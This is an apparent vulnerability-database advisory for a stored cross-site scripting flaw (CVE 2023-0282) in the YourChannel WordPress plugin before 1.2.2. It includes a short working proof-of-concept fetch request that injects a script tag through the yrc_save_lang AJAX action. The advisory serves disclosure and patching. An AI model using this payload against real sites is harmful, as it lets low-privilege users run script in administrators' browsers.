YourChannel < 1.2.2 – Subscriber+ Stored XSS | CVE 2023-0282 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape some parameters, which could allow users with a role as low as Subscriber to perform Cross-Site Scripting attacks.

Proof of Concept

fetch('http://localhost:10008/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=yrc_save_lang&yrc_lang[Videos]="><script>alert(1)</script>'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

The script will be exploited on the YourChannel admin page.

Affects Plugins

Fixed in 1.2.2

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

93693d45-5217-4571-bae5-aab8878cfe62

Timeline

Publicly Published

2023-01-13 (about 3 years ago)

Added

2023-01-13 (about 3 years ago)

Last Updated

2023-01-13 (about 3 years ago)

Other

Published

Title

Published

2023-04-03

Title

Product Enquiry for WooCommerce < 2.2.13 - Admin+ Stored XSS

Published

2016-03-18

Title

Resume Submissions & Job Postings - Stored Cross-Site Scripting (XSS)

Published

2020-11-16

Title

Paid Memberships Pro < 2.5.1 - Authenticated Cross-Site Scripting (XSS)

Published

2024-08-13

Title

Chatbot Support AI <= 1.0.2 - Admin+ Stored XSS

Published

2025-06-19

Title

Elementor Website Builder < 3.29.1 - Contributor+ Stored XSS